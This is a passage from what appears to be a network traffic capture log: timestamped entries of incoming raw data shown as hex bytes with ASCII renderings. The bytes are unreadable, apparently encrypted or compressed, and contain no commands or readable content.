                                                                  2021-09-30 21:52:28 UTC3840INData Raw: 8d 27 24 a3 75 14 b3 9d 81 9f 06 3b c0 21 fe 34 0a 8f 5d 20 2f 41 c5 91 54 02 c9 da 51 7b a1 6b 36 1f 3d e5 09 4d 87 c0 8d 73 4b 17 58 66 9e fd 29 51 12 1f 3e 25 20 aa c8 a3 7f 08 2f cc 76 c8 ae f9 e2 79 a1 4d 8d 68 cf a0 8f 6a cd f4 b7 46 d6 ef a9 06 af 6a d1 62 82 45 63 f7 f3 46 ab 9f 99 60 85 39 c8 88 8a b0 cb 5e 20 41 8c 29 77 6d 8d 8b 5b a4 7b 3d 15 0f d2 a1 89 3a a5 13 17 b0 ea 54 e8 2a 2d d2 8e 6a a3 78 56 05 f6 2b 36 b2 09 ab 4c 48 f1 60 40 e0 b4 bc 33 65 bc c8 9e 76 0d 99 24 7b 6b 08 ff 71 ce 76 ff 1d f7 b3 52 8a e7 4e 4c 9f 1d c1 3f 82 8d 1a 9b be b7 29 82 15 81 08 1f b9 b4 68 53 a1 f3 8b b5 5f 33 e4 cd 10 7a b5 79 8f 7a 3a 30 fa cd 27 b7 41 54 8b 23 b7 5e f8 c9 12 6c dd bd cd 35 14 ab c0 81 00 20 43 d1 7a b7 99 33 c4 15 60 5f aa b7 f5 41 fd 69
                                                                  Data Ascii: '$u;!4] /ATQ{k6=MsKXf)Q>% /vyMhjFjbEcF`9^ A)wm[{=:T*-jxV+6LH`@3ev${kqvRNL?)hS_3zyz:0'AT#^l5 Cz3`_Ai
                                                                  2021-09-30 21:52:28 UTC3856INData Raw: 1b 7e 47 12 fc c6 be 26 2a 66 c2 b7 88 67 22 ef f4 47 bb 75 05 36 55 3e b4 ea 63 16 99 49 ed f4 11 ae 0b 9d 76 f2 a4 04 f7 4e 57 ed d2 21 a4 27 3d 6c cd 16 3e 9b 57 e5 80 a3 da 79 0e ab c4 4c 02 a7 58 53 ae 0f d0 a2 05 a5 4d 28 ba d0 57 0c e0 e5 db ce 5f 10 11 5a c0 4b 18 04 c7 80 7e f7 25 f9 93 d7 f5 a3 ea 9f 84 b5 45 e1 81 99 19 2b 5b 42 ce fc b0 55 23 25 00 ea 8f cc dd 67 2e 70 fa 1d 5b 23 4b ea 05 2f 89 c1 59 30 29 12 4c 6a 08 b0 b8 1f e9 5f 12 16 03 20 d5 f0 4c c7 7f 8b 41 63 91 39 4a a3 1d 15 a7 c5 c5 45 ec 68 22 c8 d0 dc ed f1 b2 d8 29 53 5d 95 e0 82 d0 18 2a a5 42 4b 20 e2 01 a1 cd 39 e6 f5 b2 d7 73 50 14 27 e2 31 f9 af b5 1e 3b c7 f1 b4 51 0d 91 c4 2b d7 ff 87 12 9c 42 93 bf 8b 7a 67 da c9 0f f4 d9 bf 67 49 5a 68 eb 79 c9 d5 39 7c 5f ac 5e d4 f6
                                                                  Data Ascii: ~G&*fg"Gu6U>cIvNW!'=l>WyLXSM(W_ZK~%E+[BU#%g.p[#K/Y0)Lj_ LAc9JEh")S]*BK 9sP'1;Q+BzggIZhy9|_^
                                                                  2021-09-30 21:52:28 UTC3872INData Raw: ae fa bd 7f 79 4f ef 55 25 c2 ab 0a 61 68 0f 3c dd ed 6a b3 7b 62 31 97 bb 48 30 12 f1 00 12 de 09 c3 3f dd be 67 67 7d b9 8c 60 64 76 37 b8 f0 1a 25 0b 3b 9a e6 7e c1 5a 90 0a 15 16 35 7d fb 77 69 c4 5e 4e 58 da 56 03 e0 fa 07 52 b3 80 08 f1 e2 5a e5 49 ca da 25 30 48 d6 fb f8 47 6d 3c 2a d6 cf 78 59 db 7d 2e 5b bf 5b c4 4a c1 c5 6c f2 89 10 a5 d2 21 0c 79 21 5f 4a 85 05 12 10 e2 4c 27 61 c9 72 ec e6 cc 0f 9f 33 5f 9b ef 74 28 5b ca 16 c3 55 07 b7 07 36 95 38 03 d3 6b 0b 1f 95 09 36 ea aa d7 05 0e 41 2b 7f 4d b6 8f 34 57 69 d7 89 fa eb 3e 99 e9 04 5b 01 23 ce f2 f6 87 16 a9 38 33 dc f7 df db 9b 8b 1c 4d 9e 28 9b 24 73 de ac 78 21 f0 18 78 98 dd cc ea 02 e1 12 92 b2 eb 1a a7 51 b7 89 05 63 7e 65 ee 94 53 4c f0 bf 0d 3e cf 78 e8 35 5a 1b 69 ef a7 f1 a1 64
                                                                  Data Ascii: yOU%ah<j{b1H0?gg}`dv7%;~Z5}wi^NXVRZI%0HGm<*xY}.[[Jl!y!_JL'ar3_t([U68k6A+M4Wi>[#83M($sx!xQc~eSL>x5Zid
                                                                  2021-09-30 21:52:28 UTC3888INData Raw: b6 13 93 c8 ee 2f 79 f3 f7 1c 97 89 7b 4e 34 92 e0 b9 ce 4f 69 f4 8e 76 9e 00 42 be 17 92 28 6e 44 2a 9b 0f 75 a0 12 e4 1e 88 c8 22 66 93 f1 81 a5 93 5c 20 c8 be 11 e3 10 7a 91 d5 95 03 0b 6e 1a 7d cc 62 c8 af 63 79 0a 4a 7d 7e 1d 4b e5 bf 40 90 19 80 c8 72 de c9 55 9f 3c b1 b5 26 77 a9 68 f8 d6 10 4f 68 b5 83 1c 16 e4 19 0a 5b 30 6b 5a 75 45 fb 63 fc 67 ce 74 fa 32 3c 5c 97 10 c0 6b 49 73 bd 19 15 c6 c5 cf 85 68 16 07 c4 e3 0d 3b b7 2e 1b e5 86 95 55 d8 cc c2 b4 b3 75 c9 63 5e 10 3a 01 ca 9c 5b 75 50 8e 67 5c 34 51 3d c2 e0 7c 81 0a 76 02 16 12 70 c7 33 8d e7 81 ec d3 59 9a 60 85 05 2d b8 2d f6 57 47 39 bf e0 d8 99 83 e1 eb 20 8c 19 d4 da f7 5e 4c 68 0a 8c 6a a9 27 1e fd be e4 c2 04 3c 39 dd 53 f8 c5 7f 66 be 80 17 f6 b6 92 89 1d 0e 3b d9 1e ba d7 6e 31
                                                                  Data Ascii: /y{N4OivB(nD*u"f\ zn}bcyJ}~K@rU<&whOh[0kZuEcgt2<\kIsh;.Uuc^:[uPg\4Q=|vp3Y`--WG9 ^Lhj'<9Sf;n1
                                                                  2021-09-30 21:52:28 UTC3904INData Raw: e2 26 fb 07 e3 82 a9 48 09 9d 17 6c 35 e5 a1 c4 23 01 7d db 35 53 56 36 80 f8 11 51 01 c7 5c af 3a c4 ca f5 49 a3 49 07 6e 5e 6f f5 2d 36 e1 40 55 76 76 c6 aa 78 ae 25 a9 43 1e cb 37 ab 60 09 61 99 1c 61 27 e7 42 85 47 bd c9 0f 34 6f 92 05 af 9d f5 c6 42 6a a8 a8 d4 d0 2c e1 7e 48 d0 f6 56 7b 97 6c 5b 47 f0 bc 3c 07 2d 76 fa 9e 77 58 fa 62 b0 ec 65 cc 0f e6 f3 6b 2c 44 06 3e b4 00 b4 ea 41 67 1f af ef 78 ff 1b d1 45 57 2e 50 1f e4 41 0e d2 b3 91 1e 16 85 ec 29 aa 09 c9 a2 c6 36 d0 6d bf ef cc b4 a8 d0 e9 fb a3 aa 21 c3 b8 f7 87 b5 e1 37 42 e1 bb 77 63 24 b4 ac c8 ac a2 40 b0 64 21 f9 0f ad ad aa e1 d3 5e ba e9 ad 1d 26 7b 30 d6 9b de 8b 72 f6 98 d2 a1 3e dd 04 8f f5 f1 3b 28 f2 27 0d 76 df b9 da f3 89 ca 3b 37 26 d5 9c 40 64 5f d9 8e e4 58 75 c2 c2 43 15
                                                                  Data Ascii: &Hl5#}5SV6Q\:IIn^o-6@Uvvx%C7`aa'BG4oBj,~HV{l[G<-vwXbek,D>AgxEW.PA)6m!7Bwc$@d!^&{0r>;('v;7&@d_XuC
                                                                  2021-09-30 21:52:28 UTC3920INData Raw: a1 06 61 fb 3b 2c cf 4d 27 04 02 a8 69 f9 bb 91 25 32 c5 bb 1c 01 f1 c4 4c aa d6 79 e1 83 17 b4 d9 d1 40 94 0a 05 8a b9 50 c1 93 c2 1a 1d a2 a6 72 b9 8c a4 e8 d9 53 46 68 fb f7 4e d5 66 c8 50 c9 aa 67 50 d0 c1 7e 3b 7b f5 70 24 b7 9c e6 12 20 3b ac 5f ce b6 91 23 a8 ae 3d ee d3 60 87 22 5f 22 7f eb 32 47 16 ac 67 13 9a 33 9e 0b 1b 34 44 ac e1 23 8e b6 8e 8c b7 d2 55 bc 9c 34 78 fa 9e b2 3c 52 5e a1 a3 41 10 01 44 6d 22 39 1e d5 62 9a bf d3 4e 6f 6f da 8d e6 c2 90 ea 63 a7 ff eb 79 2a 24 3d 9b 1f 40 68 58 4e 2b 6a 65 0d e2 fd ec 01 5f c2 d0 2b d8 18 42 0b cf 52 a3 50 e0 e8 53 b5 fa 1f 18 82 0f f5 a5 e1 ff a9 e6 d0 7f b0 ef 32 cc 40 d5 cb 3e ae 98 d1 45 5e 3b 89 5f 13 de 04 ac f6 95 bd eb e4 00 e8 24 4d fc 37 f4 b4 fb a9 78 b9 00 9e 8c 4f 36 78 f5 ee 55 ac
                                                                  Data Ascii: a;,M'i%2Ly@PrSFhNfPgP~;{p$ ;_#=`"_"2Gg34D#U4x<R^ADm"9bNoocy*$=@hXN+je_+BRPS2@>E^;_$M7xO6xU
                                                                  2021-09-30 21:52:28 UTC3936INData Raw: 50 55 c6 cd 11 90 0e f9 93 84 db 95 d7 f6 0b c0 4d 3f 3c f0 58 cc 34 53 b6 54 50 6c 75 ad aa 4b df 62 d3 ff 19 02 3b 05 01 27 43 14 78 a1 68 c6 a5 c7 fd 07 e6 5f f7 72 4b 0d fd a5 92 32 d0 7e ad 3c b4 38 36 18 a7 04 f1 cc f0 08 62 e6 d0 f2 e9 4a f4 9e f1 7d c5 db 62 e8 cd d6 cc 81 86 df b2 c6 60 d7 dd 23 c5 c2 58 32 49 64 30 e8 da 46 51 26 92 29 8d 16 73 a0 76 12 da ef 6b 6a 83 b4 9c 02 bf c7 e3 0a 22 7f 47 54 47 74 1f 0f 41 83 37 c8 dc eb 1e e4 93 ec 0d ed bd 0c dc 0d d4 aa 7d 6a b6 60 a1 44 66 21 ca 31 24 3b da fe f5 95 bf 7f 9f b9 13 e9 82 61 95 4d d2 04 cf ae 62 4e 22 c2 66 83 78 5c f4 0d a0 29 06 2b ce 2d b1 11 59 ac 79 ae e9 c8 44 03 c7 ad 64 d3 bf 28 56 33 04 1e 9c e1 59 16 8a 6f 58 f7 1c 51 de b4 74 be 4e 7d de 71 45 50 a9 36 ca 9e 6e 76 15 47 aa
                                                                  Data Ascii: PUM?<X4STPluKb;'Cxh_rK2~<86bJ}b`#X2Id0FQ&)svkj"GTGtA7}j`Df!1$;aMbN"fx\)+-YyDd(V3YoXQtN}qEP6nvG
                                                                  2021-09-30 21:52:28 UTC3952INData Raw: ca 84 10 b2 ac b2 9b cd eb ee 82 93 eb f8 ba 0d c5 f8 47 a0 38 c7 42 11 d3 2f 1a aa bd 7d 67 de ce fc e4 71 63 44 93 77 c9 63 3e 9f 80 a4 08 62 c2 ac 3a dc 92 db 83 72 08 1c d7 a4 d4 9e 0e d9 c0 b9 8c 23 64 02 38 e6 ee d7 9d 6f 8b e8 8e 00 4f 89 94 a5 70 03 fe 14 7a ff 82 c1 8b 24 91 9e ff e5 15 d5 3c f6 18 31 23 24 59 1b 16 c5 5f 08 69 b4 5f 0b 5a a7 c2 c4 89 48 e2 b3 e5 47 10 6d b9 4c e8 af 83 20 41 28 f9 c8 2e 7c d5 12 54 32 58 9d a8 4d 0e 43 bf 00 a0 21 d2 a9 de 88 72 75 2e c7 55 3e cd bf f0 d9 08 b2 99 91 1f 91 01 c2 99 be f1 08 ce a9 e2 84 d7 49 ea 75 16 5e ea 78 84 cb 79 bf 5b de 1f 59 78 5a e6 11 fa e0 32 08 47 2d eb 28 02 97 4b 3e 8a 3e ce 49 78 7c f8 6b 89 fb 9f 51 cf f1 56 fa 5c a7 0c d6 42 4c 05 10 9b 31 ac 71 bd ac b8 59 da 15 a4 36 f4 c5 7c
                                                                  Data Ascii: G8B/}gqcDwc>b:r#d8oOpz$<1#$Y_i_ZHGmL A(.|T2XMC!ru.U>Iu^xy[YxZ2G-(K>>Ix|kQV\BL1qY6|
                                                                  2021-09-30 21:52:28 UTC3968INData Raw: 84 b5 3e 92 76 72 bf ac 8d ab f0 5c e9 c0 9b 5a 9a 26 60 7f 54 8b 18 5d e7 c3 86 e8 cb ed d0 96 8a 58 ee 2e 15 a1 6d c3 b4 16 19 6f f0 ef b8 db da 51 d1 f1 be 75 b3 03 3b aa 68 60 91 ca 62 38 66 3a 06 1a ec 45 a6 d4 2d 2e 7e 41 dd 0a ab 1d c6 11 4d 06 bc 43 28 ba 0a 34 85 c8 45 17 9a fc 13 24 a7 36 df a6 22 fd 00 2b 14 05 14 4e 69 3c e8 b6 9b b9 e5 d7 e5 f4 e4 c5 84 51 92 63 16 1f a1 91 7c 43 72 43 2f c6 47 a2 96 f9 7c c6 f3 6b f9 55 42 d0 b3 b4 a1 db 16 b5 81 73 22 c8 ec ab 0e c9 f2 8c 08 65 8f de 53 d2 9c fa 35 26 81 31 74 1a a6 84 fd cb 6f a7 0d e3 0e ce 7e 12 e5 b0 bf 25 b0 f3 4f 49 06 4c 56 54 fb 9b 09 a0 a4 bd 90 e9 06 32 08 be 0b 35 3c a3 7d eb 2d ed ca 18 44 bd 50 b7 33 51 d0 6f be 94 da 40 08 4b 2e 80 ae a0 11 80 9c cc 7f d6 9a fc 7a 78 61 ce 7a
                                                                  Data Ascii: >vr\Z&`T]X.moQu;h`b8f:E-.~AMC(4E$6"+Ni<Qc|CrC/G|kUBs"eS5&1to~%OILVT25<}-DP3Qo@K.zxaz
                                                                  2021-09-30 21:52:28 UTC3984INData Raw: 76 29 a8 bf dc cb 7f cc 8f 59 1a 40 35 17 9d 58 a3 97 1b 95 8d 54 4b c6 4d 17 db a1 87 69 a4 fe 28 e9 18 47 e8 96 61 6c 88 58 71 31 5b 57 d3 ce 94 ca 21 ad c9 e8 74 b9 b9 d7 33 ae 26 c9 9d 52 f6 ea 83 39 e6 ea de 24 63 2d fb 05 0f d0 51 1d dc 44 5c c3 9e 1f 8e d3 c2 60 e6 03 0c 4e 19 f7 6a 7b 19 a7 58 50 59 15 b9 4d 74 dd d5 f7 2b 72 31 b3 12 be 83 2a 51 09 4e 9b a7 ef 27 4f 79 39 72 2a a7 40 17 d3 b0 80 ab 9e 4b f5 f0 4e 9e 05 08 91 0e d5 ad 02 f6 3a 4f 86 07 dd e9 68 79 66 eb e3 c3 ec 97 f3 e5 b6 5b 1c a3 3f d4 5a 52 ff c6 bd b4 76 49 ef a0 ff 5c 50 d5 6f b7 2f 34 ab 92 dc 6b 11 eb e2 d4 62 db 2d a1 a4 a3 db 8f 3c bb 8c ca 53 f5 24 e5 07 79 10 e3 f6 38 28 eb 0d 02 b2 3f e5 a7 6a 24 5f 8c 5c 40 00 55 9e bb 2e cb 02 80 55 7b d4 a6 5c cd ea 84 53 11 e7 ae
                                                                  Data Ascii: v)Y@5XTKMi(GalXq1[W!t3&R9$c-QD\`Nj{XPYMt+r1*QN'Oy9r*@KN:Ohyf[?ZRvI\Po/4kb-<S$y8(?j$_\@U.U{\S
                                                                  2021-09-30 21:52:28 UTC4000INData Raw: ff 08 e7 12 36 67 08 c6 19 68 01 cd d6 c3 31 36 47 3f ce e0 e5 fa ca a5 39 6f af a6 20 f1 e2 2a 60 76 8e 0e 56 b7 e7 4f 4b e1 7c 3a a1 61 b6 90 c1 4c 00 5f 82 ce b6 09 c1 47 73 6b 9d db eb 83 c6 ca 21 4a 80 50 29 a7 0c 27 c1 5c 76 63 8a eb 87 95 59 c8 e9 14 8c 99 3a 3d 4c 75 68 e7 cd b6 b9 ee 13 4c 66 53 0e df 5d 9a da 1c 41 72 82 8e e4 ff a6 de 57 3d 35 7b 90 22 58 d0 8c 78 e9 d3 83 d2 79 65 d6 ec ad c3 ee 13 c5 c1 f7 f6 67 84 7f 0d 3e 26 31 c2 2a a8 c0 4c 4b b3 ef c6 39 5c 41 c4 1f de bf 7f 31 96 bf 5f 6c 90 03 65 74 93 61 9f 72 9e 60 94 76 b2 f4 16 22 58 83 1a 98 4e 43 2c 59 d3 eb e5 78 ef 74 ad c8 7a 99 d6 81 e5 f6 39 c7 0f b8 a8 93 d1 42 b6 78 99 db 5f 2d ec f8 98 f7 e5 13 07 7e ea 09 7a 96 f8 38 06 8f 29 20 be 26 90 41 e6 f2 d5 6f 44 9f b0 26 db a1
                                                                  Data Ascii: 6gh16G?9o *`vVOK|:aL_Gsk!JP)'\vcY:=LuhLfS]ArW=5{"Xxyeg>&1*LK9\A1_letar`v"XNC,Yxtz9Bx_-~z8) &AoD&
                                                                  2021-09-30 21:52:28 UTC4016INData Raw: 6b 16 92 b6 84 56 3f 73 5f ed fe b1 1f 56 05 e1 30 dd 71 1d 8d e9 7e bb 43 be 2e 77 34 69 c6 2c 6b 7d fb c2 0c 24 aa 50 fd d5 1d 01 01 26 44 3e 8c 58 49 45 bd 9d d3 07 1c d6 92 d0 4b 5c 34 3b c2 f2 28 bb f3 f4 9c 76 9c ec 25 e0 fd c6 25 4c 90 98 51 f1 b9 60 92 f1 2d b4 ac ae 5c 24 a7 41 b6 a4 44 bd e7 a1 2e dc f2 38 29 b3 ca a9 71 8d 63 e3 52 dc 55 18 1a af 2e 3d 4d 43 f0 e2 e5 63 e1 a7 18 7f 6e 3e 50 fd c5 75 ba 01 0a 70 97 7d 48 5e 5c ee 11 07 fa f8 d3 68 d2 a3 7b e3 f8 b1 7e 8c 99 f1 f3 bc 6d 1c 2b 49 a0 e6 9c a1 01 63 a5 c1 7e d9 09 15 1b 62 ca 5c fc cd c1 a6 39 38 8a 23 b3 6c 51 f3 be 87 9b 2d 96 50 41 0e dc 37 02 dd 94 e6 50 48 db c8 62 ec 7d c2 01 b7 69 a1 b3 b9 58 3c dd f9 c7 c9 7c 7b ef 8b fa 0e 62 2b 06 b9 fc f6 e3 76 70 c9 fe 23 55 6b ea 17 f2
                                                                  Data Ascii: kV?s_V0q~C.w4i,k}$P&D>XIEK\4;(v%%LQ`-\$AD.8)qcRU.=MCcn>Pup}H^\h{~m+Ic~b\98#lQ-PA7PHb}iX<|{b+vp#Uk
                                                                  2021-09-30 21:52:28 UTC4032INData Raw: a8 9f e9 47 ab f5 5f 58 ba 3b 39 7a d0 ae 8a 21 8e d4 04 e1 9e 07 a9 ab 69 4d 72 2d f3 a2 26 64 bb f6 96 37 04 3b 31 a4 90 cc 22 c9 4a 63 b6 4e 85 a6 7a 5e 93 9d a9 80 c6 62 e6 20 56 e9 a6 a1 d7 ad 95 31 38 ed f3 a4 f0 67 bd 47 e4 e1 0c db cd d4 84 5a 4f 2b 1a f9 2d aa 7a ec e8 c7 ad 8a c0 04 bb cc ca 78 b8 37 99 d3 a5 22 3b d7 c7 6e 28 58 5e dc 26 d5 a9 4f a5 e5 1d d9 b2 75 dc 08 d1 6c 61 f9 73 cb 43 61 ef af 6f 88 b6 2f 4e 75 26 a5 4e 94 06 de 74 2f 43 ca 81 9f 88 eb c1 90 10 dc ae 56 d5 bb a5 65 d1 13 2e bd f4 59 33 04 99 68 7a 9e c3 22 19 be e5 05 7c d0 b7 dd 36 bc d8 1d 94 a1 b0 e2 bf 92 bc d9 f6 01 7b e6 83 4b 83 d8 a9 67 ad f0 74 dd 0d 97 85 7a c3 9a 08 c5 3a 57 a9 d9 18 d6 ba a2 df 6b b5 e2 3d 1f ee d7 97 e7 04 3b 7c a5 c6 b8 bb e3 51 da c1 d8 f7
                                                                  Data Ascii: G_X;9z!iMr-&d7;1"JcNz^b V18gGZO+-zx7";n(X^&OulasCao/Nu&Nt/CVe.Y3hz"|6{Kgtz:Wk=;|Q
                                                                  2021-09-30 21:52:28 UTC4048INData Raw: 6f 34 c0 16 7d b8 17 1d 44 de 12 2f 8a 45 54 8a fa 75 6f ea 63 ce cb 5b 0b 97 c7 8d 9c 61 2d c3 2f 21 c8 8c 8d af 51 e0 1e 3d c6 64 82 81 54 fb 03 a3 f7 13 7b 9c 0e b4 45 2d 48 13 eb 89 e2 5c 7c ca 54 a4 e6 74 ea 32 54 44 cc a3 dd df 32 e7 d7 48 51 fe 88 12 e4 0e f1 f5 36 5f bb 3b 9e 5c 1f 36 69 82 e9 e2 5c 03 4e bc 63 e9 58 13 ce 8b 3a 08 6a d3 61 5d e4 40 f6 bf 49 f1 96 94 a6 9d 89 ce eb e7 1c 15 2f 6a 3e cc df 55 c7 52 3e 78 22 18 b8 e6 8b 79 d4 7e 38 69 76 bc 0d 2f ad 0f 0e a2 e6 f7 20 cd d4 02 13 74 85 d8 b9 54 e8 a1 6b a7 7e 02 35 48 c6 49 cb 56 9c 87 9b 04 35 b4 30 8d 17 e4 76 51 57 23 d8 2a 87 79 65 28 af 23 7c 1c f7 93 82 be 22 c4 46 23 f1 7b c0 03 34 0f a3 4c 2d 8b 11 15 0c 76 43 d0 21 47 b4 6d 96 13 5c d3 38 6f 7c e3 fa cd b1 57 9b 2f f6 59 e1
                                                                  Data Ascii: o4}D/ETuoc[a-/!Q=dT{E-H\|Tt2TD2HQ6_;\6i\NcX:ja]@I/j>UR>x"y~8iv/ tTk~5HIV50vQW#*ye(#|"F#{4L-vC!Gm\8o|W/Y
                                                                  2021-09-30 21:52:28 UTC4064INData Raw: ba 1f 36 59 bb c3 f4 0a 97 09 83 6a c3 74 05 59 fd 1b 1f 9a f4 ef 95 cf 60 d2 ed e9 8f 08 4f 0f 3c 82 8e 11 5d bc 99 3e 88 9f 40 de 1d 16 df af be d8 c1 0f 7f 56 43 78 a2 50 72 ea 0b d7 66 ac fa 7f 7c 04 ad db 9a 36 c2 07 bb 5f 4f 5e fe a9 51 09 51 ac 0c 56 87 0e 9e d5 9e 73 69 7b 45 1f ba e1 04 01 59 8c a5 3e b4 22 10 04 6a 81 a4 97 bc 6e 73 24 69 83 8b 73 29 9e bd a4 17 5e 57 05 9e 2a 46 26 86 67 33 66 a2 16 51 5e 42 d1 3a f8 aa 65 33 21 3d 73 80 21 26 81 07 88 41 7f e2 aa cc c7 ef d3 d8 bf 10 6e f0 79 dc 50 31 cf da 2d 66 3f 54 85 0d b4 bb f8 17 93 1a a3 b5 aa 3f 19 e7 92 8c a6 e3 84 98 fc cd 42 35 e5 4b 8d 02 b9 15 a1 67 0e e1 2a 68 e5 bc d4 ad 59 57 4d b6 79 bc 1a 5c d3 2a 81 45 e7 cf 54 3a 50 e3 a0 48 13 48 05 f9 04 dc 8e c7 05 6b bb bb 8b 4c a1 e6
                                                                  Data Ascii: 6YjtY`O<]>@VCxPrf|6_O^QQVsi{EY>"jns$is)^W*F&g3fQ^B:e3!=s!&AnyP1-f?T?B5Kg*hYWMy\*ET:PHHkL
                                                                  2021-09-30 21:52:28 UTC4080INData Raw: a5 39 87 b0 b2 c0 9c da bb 2a f9 84 88 95 af ba 49 fb 77 32 c7 53 45 3f 67 de e5 14 ac ae 2f 59 87 53 eb 94 9c a9 a0 11 51 1a 1f de d7 03 5d b7 01 34 56 25 67 2c 18 f3 ec 25 62 90 8d 8a b8 d5 91 d5 c3 34 cd 14 76 83 d3 3a 31 7c 65 b3 fd 37 3d e8 84 a6 c9 a8 47 df 7c 2a b5 be 81 91 27 eb 09 4d da 92 4e 15 d9 15 ad 99 bc f5 92 10 b9 1d c9 f1 ec 86 d1 ae 9b 14 bb 99 6c dd 94 5d 95 90 6e e0 b0 1a 94 bc 01 28 0c 5e 66 b8 f0 58 86 3a de 87 8b b4 9a f6 ac 6c 46 6f 8a 13 aa 20 ec 89 ae b9 f4 98 5a 2e 76 b3 ca b9 91 79 d4 3b a0 e8 36 75 29 34 8b 78 55 79 68 a2 cd 52 72 4d 45 32 54 ad 77 8e 7c 91 be 4b f1 7a e6 93 43 5b ec f0 61 95 3c 72 2b 69 b1 28 7e 64 ae 4d 56 f0 20 25 67 b8 55 8b 96 e6 6c 64 fb 9f 1a a6 6e f0 e4 05 89 43 f5 c9 4a 6e 71 fd b4 eb 58 d7 8d eb d5
                                                                  Data Ascii: 9*Iw2SE?g/YSQ]4V%g,%b4v:1|e7=G|*'MNl]n(^fX:lFo Z.vy;6u)4xUyhRrME2Tw|KzC[a<r+i(~dMV %gUldnCJnqX
                                                                  2021-09-30 21:52:28 UTC4096INData Raw: 61 75 44 73 e9 7f a0 cf 88 d5 cc 74 3c 95 8a 1a 19 d3 03 72 3f 95 dd e7 72 da 1b 69 44 59 3b e9 6c 4b a2 60 38 10 3d 6a 88 e3 20 f9 8e 4b 38 9e 7b ff c3 48 1d d9 d8 c6 ca 2d c8 b2 80 c6 81 6e b5 ef de f9 54 48 36 ea 04 ec 2b ce 8f 3a 63 28 92 a5 db cc ae 52 9f 64 49 ec 80 ed 6b c5 ba 79 42 90 44 e2 5a 46 cc fc 2b 10 cf 23 14 2f 4e ea 32 1f e7 52 6b 1a 48 84 77 b5 ec 89 e2 c5 51 0a b5 0d a5 f0 dc ba 23 18 e4 46 35 ef c4 46 fe bd 5e 39 c7 1a 64 24 98 ee 53 b2 98 0f 3d fc 2f e3 35 6f e2 eb b5 a9 de bd 14 9b f2 a5 97 29 29 d0 08 31 ed 2a 03 17 cf 43 b4 16 c9 59 4d 79 ab 07 f9 39 c4 b2 df 6e 08 e6 c4 ae 5d 9c 1a e4 aa 3e da 96 9e 22 bb 1f e5 ce 37 70 14 c0 6b c8 8d ce dd d2 50 04 54 f4 df 17 01 2e 3c 40 54 bc 10 7c 3c 05 57 4c 85 dd 86 99 33 36 33 fd e9 46 92
                                                                  Data Ascii: auDst<r?riDY;lK`8=j K8{H-nTH6+:c(RdIkyBDZF+#/N2RkHwQ#F5F^9d$S=/5o))1*CYMy9n]>"7pkPT.<@T|<WL363F
                                                                  2021-09-30 21:52:28 UTC4112INData Raw: 8b 3b 02 d4 42 72 ac a3 3e ef 5a cd 4b 25 7d 33 95 52 2a cd 8f c0 8c 01 08 d3 36 d8 ac db b3 f2 fb da b1 38 9e fd ff fa 30 09 b2 44 13 cc 70 af e8 eb b6 22 a6 2b e1 a4 0a 44 39 91 42 27 af 60 ca dc 45 df 6d f1 61 df 02 fe 54 52 2b 53 05 29 64 1a 25 33 af 8e 64 14 23 25 18 cd 92 67 2a c9 99 82 8a e9 74 1c a3 93 a4 a4 fb 6d d4 74 34 82 56 39 3d dd 77 70 7e 07 1f 77 95 79 af 7e 05 7d 97 83 08 c2 03 8f 48 49 a1 dc 51 0e da 66 91 16 db 8a 57 9b b9 df 64 0a 79 a4 cb 66 c4 46 56 37 fb 68 d8 4f 73 59 d3 ff b7 60 e4 60 08 7f 22 9c 55 bd dd a2 56 05 f1 3b 9d 7f 23 f0 8c bb 47 eb 3d 13 ba 1a 51 84 ba cd 72 49 d0 3b 95 77 68 72 ac ac 4f d3 9e e3 94 0a c0 2a e1 df 13 26 b7 ca 6e 89 6c 0e f6 22 bc d8 47 15 0c bd be fb 37 f4 17 1e a1 37 54 52 67 84 2a 91 9e 21 80 25 7f
                                                                  Data Ascii: ;Br>ZK%}3R*680Dp"+D9B'`EmaTR+S)d%3d#%g*tmt4V9=wp~wy~}HIQfWdyfFV7hOsY``"UV;#G=QrI;whrO*&nl"G77TRg*!%
                                                                  2021-09-30 21:52:28 UTC4128INData Raw: d2 26 c0 ed 42 b7 20 11 1a 9b 17 8c 8d d1 30 d6 6d 3c 37 98 e1 f0 6a 09 c4 c2 f4 7d fa e9 2b 61 9d 15 69 62 84 f8 04 3b ab 9b 96 c1 ff bb 5c fb 7d a7 53 e6 87 a5 e5 9f 3a 76 fb 14 d9 d2 34 c9 46 9c 5b ac 46 ce 91 2e 87 97 6c 5b 6c 99 44 2c 6c 41 f5 e0 04 e1 e6 2c bc 7d 8b 52 b4 b4 0f 4a ea 94 f1 66 0a 8b 63 ef 28 2e e4 cf 40 2b 46 c6 30 34 05 d6 41 f9 bf 67 21 98 82 31 d5 90 58 c7 72 a2 fc 9e aa 69 75 84 d1 13 31 2f 57 26 84 e1 d7 bb f1 51 77 c6 f6 e8 5a 04 38 e4 70 bd 09 08 aa 4c 04 54 d1 b2 0e c3 c2 b7 91 c7 0e 74 94 d4 17 8c cc c7 24 22 05 93 69 6e df 50 6d 83 35 3f 10 42 a5 8d 88 ce 7d a7 c6 5a e0 e1 02 1d 11 45 fc 5e a2 d3 21 13 89 1f 11 1d 31 84 25 94 3c f8 d4 ac 16 65 8f e0 13 65 7a 57 f0 8f 68 27 95 b9 2a fe a8 2f 83 7c bd 7a b6 8b 8b ba 09 7a 67
                                                                  Data Ascii: &B 0m<7j}+aib;\}S:v4F[F.l[lD,lA,}RJfc(.@+F04Ag!1Xriu1/W&QwZ8pLTt$"inPm5?B}ZE^!1%<eezWh'*/|zzg
                                                                  2021-09-30 21:52:28 UTC4144INData Raw: 02 8c 45 db 67 32 db 37 d9 64 c0 20 0d 0b 0d ad 98 cb 27 34 de 4e 40 c6 45 ea da c8 64 4e 25 f3 97 4e 79 ab 0b f6 e8 21 83 29 25 98 db 97 3d 2c b8 85 2e 5d 96 32 d1 c2 28 5d 65 b1 2f 0f 46 4e c4 63 05 17 22 c4 f5 3f 66 a6 3c b8 7a 07 54 85 43 7e e0 3c a9 db d4 f9 fa bc f6 59 e1 16 13 82 bc 70 20 9a f5 db 03 bf d2 95 97 2f 97 bb a7 f9 48 c7 de 29 67 c7 da af 4e a4 95 3d b5 54 1c 13 91 bf f3 4f f4 a3 9e 0d 1c e8 e5 21 b7 78 6f dc de 86 47 d8 1b 90 2c 6e bc c4 3f 51 45 ae f9 02 83 9d d2 29 ac a6 53 56 df a8 3b d0 21 8e b7 a7 65 7d 6d 7f 95 36 1e e0 61 6a 47 d7 5a c6 1a 24 69 f0 59 e2 0b f4 3e b9 72 1e 2e f6 86 37 0a 92 0a 96 26 2d c6 d5 ec 79 09 b1 9b 